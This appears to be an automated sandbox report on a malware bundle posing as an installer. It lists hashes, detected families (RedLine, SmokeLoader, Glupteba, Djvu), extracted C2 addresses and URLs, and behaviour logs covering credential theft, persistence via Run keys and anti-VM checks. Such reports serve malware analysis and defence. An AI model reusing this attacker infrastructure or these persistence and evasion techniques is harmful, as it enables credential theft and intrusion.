Analysis
max time kernel: 1395s
max time network: 2231s
platform: windows10_x64
resource: win10-de
submitted: 16-09-2021 21:08
Tasks
Static task static1
Behavioral task behavioral1: sample setup_x86_x64_install.exe, resource win7-ja-20210916
Behavioral task behavioral2: sample setup_x86_x64_install.exe, resource win7v20210408
Behavioral task behavioral3: sample setup_x86_x64_install.exe, resource win7-de-20210916
Behavioral task behavioral4: sample setup_x86_x64_install.exe, resource win11
Behavioral task behavioral5: sample setup_x86_x64_install.exe, resource win10v20210408
Behavioral task behavioral6: sample setup_x86_x64_install.exe, resource win10-jp
Behavioral task behavioral7: sample setup_x86_x64_install.exe, resource win10-fr
Behavioral task behavioral8: sample setup_x86_x64_install.exe, resource win10-en
Behavioral task behavioral9: sample setup_x86_x64_install.exe, resource win10-de
General
Target: setup_x86_x64_install.exe
Size: 6.5MB
MD5: 064f0d6900675bed580da1291a566cfa
SHA1: f81699a68c901d190842de735dbda28a3fb52292
SHA256: 7ec88d4baa0a97362a026cf6e0f46422379a99be6d9bfe19034152f3d47cc0ed
SHA512: 41dc5c444afd6b5dc0947cf9950acb5aa1081ee9921c748195325b5cfcb23532cea1802959baa59a0c41ed998ba20b509ec107da882d5d8b3bf0b1d17f892738
Malware Config
Extracted redline: medianew, 91.121.67.60:62102
Extracted smokeloader: 2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted redline: ANI, 45.142.215.47:27643
Extracted metasploit: windows/single_exec
Signatures
Djvu Ransomware
Ransomware which is a variant of the STOP family.
Glupteba Payload (2 IoCs)
Processes:
resource | yara_rule
behavioral9/memory/1044-400-0x00000000017C0000-0x00000000020DE000-memory.dmp | family_glupteba
behavioral9/memory/1044-401-0x0000000000400000-0x0000000000D39000-memory.dmp | family_glupteba
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
NetSupport
NetSupport is a remote access tool sold as legitimate system administration software.
Process spawned unexpected child process (4 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
description | pid | pid_target | process | target process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 2384 | 4040 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5540 | 4040 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 13444 | 4040 | rundll32.exe |
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 18312 | 4040 | rundll32.exe |
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload (4 IoCs)
Processes:
resource | yara_rule
behavioral9/memory/640-288-0x000000000041C5D6-mapping.dmp | family_redline
behavioral9/memory/640-285-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral9/memory/2364-326-0x0000000000400000-0x0000000000422000-memory.dmp | family_redline
behavioral9/memory/2364-327-0x000000000041C5CA-mapping.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
Socelars Payload (2 IoCs)
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203b503b429e68.exe | family_socelars
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu203b503b429e68.exe | family_socelars
Suspicious use of NtCreateProcessExOtherParentProcess (1 IoC)
Processes:
description | pid | process | target process
PID 5092 created 896 | 5092 | WerFault.exe | setup.exe
Suspicious use of NtCreateUserProcessOtherParentProcess (4 IoCs)
Processes:
description | pid | process | target process
PID 14432 created 11012 | 14432 | svchost.exe | OneDriveSetup.exe
PID 14432 created 1044 | 14432 | svchost.exe | LzmwAqmV.exe
PID 14432 created 7892 | 14432 | svchost.exe | 59vTTgxQkNQc5rmC6nQhRefv.exe
PID 14432 created 9608 | 14432 | svchost.exe | kvXppC1RJ_LmP970tG_k_8kU.exe
Checks for common network interception software (1 TTP)
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
Identifies VirtualBox via ACPI registry values (likely anti-VM) (2 TTPs)
Untitled signature (name missing from the page)
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libcurl.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libcurl.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libcurlpp.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libcurlpp.dll | aspack_v212_v242
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libstdc++-6.dll | aspack_v212_v242
\Users\Admin\AppData\Local\Temp\7zS833B3CA0\libstdc++-6.dll | aspack_v212_v242
Blocklisted process makes network request (54 IoCs)
Processes:
flow | pid | process
384 | 9184 | powershell.exe
459 | 4752 | cmd.exe
460 | 4752 | cmd.exe
562 | 7528 | cmd.exe
686 | 7728 | WMIC.exe
902 | 8960 | rundll32.exe
905, 907, 909, 911, 915, 916, 917, 918, 919, 920, 921, 922, 926, 927, 931, 932, 934, 935, 936, 940, 942, 949, 951, 952, 953, 954, 955, 956, 957, 958, 960, 961, 962, 963, 964, 965, 966, 967, 968, 969, 970, 971, 972, 973, 974, 975, 976, 977 | 6840 | MsiExec.exe (48 flows)
Creates new service(s) (1 TTP)
Downloads MZ/PE file
Drops file in Drivers directory (3 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\drivers\etc\hosts | Chmenka.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | ___YHDG34.exe
File opened for modification | C:\Windows\system32\drivers\etc\hosts | cmd.exe
Executes dropped EXE (64 IoCs)
Processes:
pid | process
4920 | setup_installer.exe
5032 | setup_install.exe
312 | Thu20dae7c52bc0856.exe
3048 | Thu20f2cf5e0c.exe
3972 | Thu20c467678e2c.exe
4132 | Thu2026c04e7218e1.exe
420 | Thu20a5f7ccaa78.exe
1788 | Thu2025d6674aed72ba.exe
2216 | Thu20bc9ea26f.exe
4404 | Thu2094524d5e5b.exe
4508 | Thu2026c04e7218e1.tmp
4512 | Thu203b503b429e68.exe
4564 | Thu2090b5515d63b2.exe
3224 | Thu20fdd9ac35a68.exe
4700 | Thu203cdb52ef3c6580d.exe
4956 | 8684174.scr
4104 | Chrome 5.exe
3844 | PublicDwlBrowser1100.exe
4372 | WerFault.exe
4944 | ___YHDG34.exe
896 | setup.exe
1352 | BearVpn 3.exe
3860 | 4873306.exe
524 | Thu20a5f7ccaa78.exe
640 | Thu203cdb52ef3c6580d.exe
1044 | LzmwAqmV.exe
2364 | Thu20a5f7ccaa78.exe
1872 | 6650495.exe
5284 | ultramediaburner.exe
5336 | Gysafaemura.exe
5448 | ultramediaburner.tmp
5456 | Quvovaekaky.exe
5772 | UltraMediaBurner.exe
6136 | 8337894.scr
1968 | 5581443.scr
6684 | GcleanerEU.exe
7004 | services64.exe
7140 | anyname.exe
6148 | installer.exe
6152 | gcleaner.exe
3924 | 72HVEuHc1LiCdlGyE_KhQi1n.exe
7252 | XBR5d0OipcZIAALv0Ds4mA_b.exe
7288 | 0IuDRAJglDutmXwQOEhSBXDa.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7316 | Gn9Jky4_EDbOI58YpznCytCC.exe
7388 | _zmz9h_0oO1LiMAufsS4G9Hx.exe
7408 | tH0ctc2jiXFQrqD_hc1dkUzk.exe
7452 | 3j37Icfa8ZkdKtGcGgFo5hHI.exe
7508 | 1LmD_gnw4q8R9TJXTApySnvK.exe
7528 | cmd.exe
7540 | WMIADAP.EXE
7552 | nRYNXU8kXWDM9ct7FinhQA1L.exe
7560 | rePWGAeA9gG8Y413QzXTBROs.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7576 | q8G7pt2bO5fMdxqZP9uX1JCU.exe
7584 | EWtGNadfMrzbtpsBi9aWUtQT.exe
7708 | usyw5ZngVKxU1DoBnfAsyAxL.exe
7816 | dX9c0VLsY6QZmDeHO24bcfz5.exe
7832 | XgjnLxbzwVfuidtVtZ1khfTK.exe
7840 | ItAFNrv2sOXUt7aWaBN3nK6S.exe
7848 | yT0Jr6qhYrzdROOogtndOL8l.exe
7856 | wVv8AImVlR_dbDz6BgqJ11oz.exe
7864 | RukWAObiV_pk8jgtTfDBZo9L.exe
7872 | kgFoGuhcdrrxNuBNV0pnzt35.exe
Modifies Windows Firewall (1 TTP)
Untitled signature (name missing from the page)
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20dae7c52bc0856.exe | vmprotect
behavioral9/memory/312-190-0x0000000140000000-0x0000000140650000-memory.dmp | vmprotect
C:\Users\Admin\AppData\Local\Temp\7zS833B3CA0\Thu20dae7c52bc0856.exe | vmprotect
Checks BIOS information in registry (2 TTPs, 30 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rePWGAeA9gG8Y413QzXTBROs.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 6650495.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | _zmz9h_0oO1LiMAufsS4G9Hx.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C3F8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | AA61.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | wwi.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | BF24.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 3j37Icfa8ZkdKtGcGgFo5hHI.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | wwl.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | EWtGNadfMrzbtpsBi9aWUtQT.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | jtW2SlgNdt8N1bR8cmz07mY3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 5581443.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | AYcoRdCUFo3EVft6taKBoNmp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 8626517.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | jtW2SlgNdt8N1bR8cmz07mY3.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rundll32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | _zmz9h_0oO1LiMAufsS4G9Hx.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rePWGAeA9gG8Y413QzXTBROs.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C3F8.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 6650495.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 3j37Icfa8ZkdKtGcGgFo5hHI.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wwi.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | AYcoRdCUFo3EVft6taKBoNmp.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 5581443.scr
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wwl.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | AA61.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | BF24.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 8626517.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | EWtGNadfMrzbtpsBi9aWUtQT.exe
Checks computer location settings (2 TTPs, 6 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | Thu2094524d5e5b.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | qT3dWYBP7ZsuOrwW4ZcUbjl6.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | Wesefesikae.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | gCRvjRb.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | USNydSz.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation | Gysafaemura.exe
Drops startup file (1 IoC)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\autoruning.ini.lnk | SQWM6AN8HIEEB4JT.exe
Loads dropped DLL (64 IoCs)
Processes:
pid | process
5032 | setup_install.exe (5 entries)
4508 | Thu2026c04e7218e1.tmp
1828 | rundll32.exe
6148 | installer.exe (4 entries)
6900 | MsiExec.exe (2 entries)
6908 | rundll32.exe
7864 | RukWAObiV_pk8jgtTfDBZo9L.exe
7388 | _zmz9h_0oO1LiMAufsS4G9Hx.exe (5 entries)
9432 | rundll32.exe
6840 | MsiExec.exe (12 entries)
7552 | nRYNXU8kXWDM9ct7FinhQA1L.exe (2 entries)
4088 | 30m_VqBd5yyKL_Q269RMiiX0.exe (2 entries)
8560 | 818D.exe (5 entries)
11204 | forfiles.exe
6584 | D2B.exe (2 entries)
1148 | rundll32.exe
10936 | client32.exe (6 entries)
10840 | build2.exe (2 entries)
15972 | rundll32.exe
18188 | rundll32.exe
8960 | rundll32.exe
60 | MsiExec.exe (7 entries)
Modifies file permissions (1 TTP, 1 IoC)
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 4 IoCs)
Processes:
description | ioc | process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Media Player\\Qynuloqulae.exe\"" | ___YHDG34.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\ppsrzufm = "\"C:\\Users\\Admin\\oamuufuc.exe\"" | 68D4.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\bca106d2-155a-4288-a1bc-2ca8798ce8c3\\1515.exe\" --AutoStart" | 1515.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Company\\Dohetishesi.exe\"" | Chmenka.exe
Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Untitled signature (name missing from the page)
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 3j37Icfa8ZkdKtGcGgFo5hHI.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | wwi.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 5581443.scr
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | md8_8eus.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C3F8.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | wwl.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | EWtGNadfMrzbtpsBi9aWUtQT.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | AYcoRdCUFo3EVft6taKBoNmp.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | BF24.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 8626517.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 6650495.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | rePWGAeA9gG8Y413QzXTBROs.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | jtW2SlgNdt8N1bR8cmz07mY3.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | AA61.exe
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | _zmz9h_0oO1LiMAufsS4G9Hx.exe
Drops Chrome extension (3 IoCs)
Processes:
description | ioc | process
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json | gCRvjRb.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json | USNydSz.exe
File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gakekacnalcpkgkogmbmknlcdikjghba\2.5_0\manifest.json | gCRvjRb.exe
Drops desktop.ini file(s) (3 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\assembly\Desktop.ini | IDownload.App.exe
File opened for modification | C:\$RECYCLE.BIN\S-1-5-18\desktop.ini | gCRvjRb.exe
File created | C:\Windows\assembly\Desktop.ini | IDownload.App.exe
Enumerates connected drives (3 TTPs, 48 IoCs)
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
description | ioc | process
File opened (read-only) | \??\A:, \??\B:, \??\E:, \??\F:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: | installer.exe (24 entries, one per drive letter)
File opened (read-only) | \??\A:, \??\B:, \??\E:, \??\F:, \??\G:, \??\H:, \??\I:, \??\J:, \??\K:, \??\L:, \??\M:, \??\N:, \??\O:, \??\P:, \??\Q:, \??\R:, \??\S:, \??\T:, \??\U:, \??\V:, \??\W:, \??\X:, \??\Y:, \??\Z: | msiexec.exe (24 entries, one per drive letter)
Legitimate hosting services abused for malware hosting/C2 (1 TTP)
Looks up external IP address via web service (12 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
5 | ip-api.com
97 | ip-api.com
66 | ipinfo.io
67 | ipinfo.io
276 | ipinfo.io
277 | ipinfo.io
431 | ipinfo.io
432 | ipinfo.io
386 | api.2ip.ua
388 | api.2ip.ua
698 | api.2ip.ua
699 | api.2ip.ua
Drops file in System32 directory (64 IoCs)
Processes:
description | ioc | process
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent F385CA0FFEB0D022 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Firefox Default Browser Agent 81C722454A70B378 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\bEwGusBEGbIeKSSfjR | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\gnDJSXBbE | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\PowerControl HR | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\gydHPhxEz | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90} | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\xSbgDCImQNdWYmB2 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\spuMTubdtfoo | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Time Trigger Task | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\spummIlXAdpq | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\rRYXbmmYjIvrG2 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\lDWDrPZYJQBuPmKYQ | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\services64 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\DVpMShOGhTVXDiVCZ2 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\wovemSUpOFDwVyMam | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #1 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #2 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #3 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #5 | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\AdvancedWindowsManager #6 | svchost.exe
File opened for modification | C:\Windows\System32\ntdll.pdb | WerFault.exe
File opened for modification | C:\Windows\System32\PDC.pdb | WerFault.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe (12 entries)
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log | powershell.exe
File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | CNvEnVd.exe
File created | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | CNvEnVd.exe
File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
File opened for modification | C:\Windows\system32\GroupPolicy\Machine\Registry.pol | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_D975BBA8033175C8D112023D8A7A8AD6 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CFE86DBBE02D859DC92F1E17E0574EE8_46766FC45507C0B9E264E4C18BC7288B | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CC197601BE0898B7B0FCC91FA15D8A69_34F3913AF70BE4077DF40170FF89FAE0 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_40AA5706A3E9B7051D7711C8169350B1 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_BF5C002C0B47AC940D40DFFC532E4C71 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_BF5C002C0B47AC940D40DFFC532E4C71 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CC197601BE0898B7B0FCC91FA15D8A69_34F3913AF70BE4077DF40170FF89FAE0 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 | gCRvjRb.exe
File opened for modification | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies | gCRvjRb.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
Processes:
pid | process
1872 | 6650495.exe
1968 | 5581443.scr
7388 | _zmz9h_0oO1LiMAufsS4G9Hx.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7560 | rePWGAeA9gG8Y413QzXTBROs.exe
7452 | 3j37Icfa8ZkdKtGcGgFo5hHI.exe
7584 | EWtGNadfMrzbtpsBi9aWUtQT.exe
8084 | jtW2SlgNdt8N1bR8cmz07mY3.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
9036 | wwl.exe
8920 | wwi.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7884 | AYcoRdCUFo3EVft6taKBoNmp.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7568 | mG10dmTajtqdi6FuJgXzFaN5.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
10176 | AA61.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
9600 | BF24.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
7308 | a3nSYK3QiDj60t0XJFF7UlrQ.exe
